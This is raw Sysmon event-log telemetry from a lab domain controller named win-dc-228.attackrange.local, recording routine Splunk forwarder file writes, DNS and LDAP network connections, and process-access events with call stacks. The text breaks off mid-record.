10341000x80000000000000002202392Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202391Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002202425Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:36.240{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B798C366AA003C4AD21A14E69F80765A,SHA256=0074ACF06C45E1C6C1CAE0892BD88315D7CE7BD7ED782257E359569B10911FA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202424Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:36.021{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2987B10C4D38AF408380C7223C32441F,SHA256=79C5810B0CEB4B260D61F8414E5957BCC007D308F18D86F89980B6EF29560793,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202427Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:33.029{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60631-false10.0.1.12-8000- 23542300x80000000000000002202426Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:37.052{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFE73F0C3C5153EBFCE9C5B0EEC35BF6,SHA256=D717F66B059F5BA4ED0EBE1AEDBD5FB86F097A5D48C279AE4C677844CF39EE8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202428Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:38.115{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7266A2D169565EC7A2984A4CCFE62011,SHA256=CBBE078A168105F4C6AEF1047953673060630F722FEDF3B9DFF53A6B2BCB81DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202429Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:39.334{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09650F5C3FC246FBBA0BEEA97456A697,SHA256=3C38B657538DD652460A07D013FCB7D822A10E310A35562343796AC2042C5EEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202430Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:40.349{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86FF501916CA06F6CFB22612AE50BD41,SHA256=044FBE25F4594B6A8457715C5C01253254BCDED6B258CC9CC888263ACE7B891E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202433Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:41.443{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FA34F4685810A9A6AE61AC5E7403B070,SHA256=8B4A61DEE9CA8A15157074265EEA1A8EB383526EC2368699CBC245289C7EB251,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202432Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:41.443{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=91BA5B110BC8E61A647777A7E0DD2722,SHA256=DF4295119E9EBFDEF2CC7FC26F1EB81A3F803428BB0B74F20FE7952B6EDC574C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202431Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:41.365{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB774579AF1B99D6399173284156CA9E,SHA256=38E0F24018227961DD3B1E942FAD3D9A70C7B7092C72F3FB5ABBAD07F6DA48B6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202435Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:38.060{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60632-false10.0.1.12-8000- 23542300x80000000000000002202434Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:42.380{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD821D627C5C1B951100D5F04320A519,SHA256=21671BA0D7E54CD7927FBCEBE2EBD0D1C9357C4A3141D767091773E11177B4F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202436Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:43.396{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=235351D05B1C3CD75EAABC8681F37BBA,SHA256=262C6818E6EB70A668C94508357BCA7370D3B9216AE5285A61FDCE64144F88B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202437Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:44.412{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA87BAC7B208BC5125BCA9602A68411B,SHA256=AFCE08F53B2382E65636BFA866824F99944390B8AE3EDC514AC09492B7B12F1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202438Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:45.427{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A08635BD5C43CA94778B150726390A5,SHA256=E7C6D71DC1FC66E7D1BCCF7158B2A6F25F46A11B00891C6C45ADB4371B12F014,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202442Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:43.294{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local61742- 23542300x80000000000000002202441Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:46.459{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6EA4F2DD19CF792AD2D66AC684AF64FA,SHA256=9033411A7F2AE0A9186DC3CC450DE8CFB3E4D1FC81E6F94CB9A2C8DCC1DA24BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202440Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:46.459{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FA34F4685810A9A6AE61AC5E7403B070,SHA256=8B4A61DEE9CA8A15157074265EEA1A8EB383526EC2368699CBC245289C7EB251,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202439Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:46.443{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C185064BCF89BDBF05A48A3247427AF0,SHA256=B9F9776270E08D4967A64C1A6BCB0C83786321D95D4152E42D871AD595150A74,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202445Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:43.316{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-52159-true2001:500:a8:0:0:0:0:ee.root-servers.net53domain 23542300x80000000000000002202444Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:47.584{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6EA4F2DD19CF792AD2D66AC684AF64FA,SHA256=9033411A7F2AE0A9186DC3CC450DE8CFB3E4D1FC81E6F94CB9A2C8DCC1DA24BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202443Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:47.459{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BE428CE7294C8D2752CD14B728218A4,SHA256=150E9B40B3353EEBD8A485683FBF926C38A32863E2BC5FBB6F8824B6847823E9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202448Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:44.294{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-61742- 354300x80000000000000002202447Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:43.889{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60633-false10.0.1.12-8000- 23542300x80000000000000002202446Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:48.490{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3E714F90378854875BEF320A629AE94,SHA256=218953FCD20A5A13F657E9783E07C2B2D4DDCF46B9916CAC7D854181F1AD6F14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202449Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:49.537{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=587FC6A466A90F8A10C4798D242878C0,SHA256=120537977D5216B58251DEF9C8D82E5EECE5039FB76999CC14FD56FED6A71C19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202450Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:50.615{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=097DB772AAEF00D632B56573762E4DDA,SHA256=3262FA02B59D2112A57B5E2DA0EEFD10DFE96E661794CE6F5B9EBFB72ABE0A3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202451Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:51.615{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F172374AAA808C48F2C3064934FB748A,SHA256=389F3A935CB4E68E016926C5F61615B4CA45110530CD98506BACA9E35D0BF9BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202453Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:52.630{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8297A8C6C769B09D82718BD4453B5410,SHA256=77E457AC88DAF38B37CDA6154821483A3A84C2B6F881A9E4F473AF1D62EA90EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202452Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:52.240{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4B6B7490964AB6CEA248F80B34C94F9F,SHA256=01814ACCFBC098223006DE81BF8EEBB521AFE201F2A944CC01E425E27FA72DB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202455Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:53.646{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0956D65633055220A53168E4B1ED9E52,SHA256=F618C4FC805389986810438C44A5768FEACE106DCD7F787F145D545A57018A28,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202454Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:48.967{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60634-false10.0.1.12-8000- 23542300x80000000000000002202457Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:54.646{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A76AD25015757A948B6CC203079CB34B,SHA256=A4EF10D499EF69B9E31C29302D75A9BE8BB19FA8CA952B4A689F2CBD6DBFDC0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202456Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:54.537{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FABCDC6AE5FE9E533F7B49FB86844755,SHA256=94ADD8BB893549AB154190D3B7B094172800A04CE8CC90B5D1EE1A76D36DA86A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202459Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:51.403{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse127.0.0.1-61742-false127.0.0.1-53domain 23542300x80000000000000002202458Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:55.662{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8BDD088FBFC9655EC9CA79B7E88BA83,SHA256=39A3FAE73C7A77EC424662EB717150259FC1E522795648C4D59590BBA1F6EB46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202460Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:56.662{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D9157855ECF7BFCC26E90FADC84FD6B,SHA256=ABD5B000F5C33E4B444E4D98F8EB5054FA4228DBE08BF73625425009F2A3B313,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202464Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:53.873{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60635-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002202463Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:53.873{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60635-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 23542300x80000000000000002202462Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:57.662{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D804393954AA2184FF399E6A0D82CE6,SHA256=2D0280CA6FA3F2EE97D20C16B22BACE79F98E04DDDE61F97985B2C4A2BEFE070,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202461Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:57.037{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A3A614AB7FE759FA1B9F837D46EE5B66,SHA256=7C21253E4198DF37021DD7FBFA62D12AC6B36983125ABF478D29502F55A073F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202466Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:54.029{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60636-false10.0.1.12-8000- 23542300x80000000000000002202465Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:58.677{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B6FCBBC9C0FF79489FC4A099421B8E1,SHA256=2D5D021E85542FE8331E9D872D9104E8F51719BB5CFC3FDBABA872FB81CC8EB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202467Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:59.693{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E1757E3A7C5ADD769B2262FB18118F0,SHA256=42A06098C048AC3A1998B9BF33632BEF50AE250308B87B4FA4A1A86C80E43DA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202468Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:00.693{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C71C4F3F32F230B1F3AEDAB12EC264DE,SHA256=06122029E29A407B6AEDF81C0DF6D7C76C0E066ECF153EAFE2BE9BD37F9D64DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202469Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:01.709{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A431067622123D46056CF944AEAD2ACB,SHA256=4781064889BF192D41150B891C919A8EC2AB4E38DBDA0CF860A239C102C6666A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202488Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:02.849{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E8D2-6040-264E-00000000AD01}5796C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202487Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:02.849{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202486Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 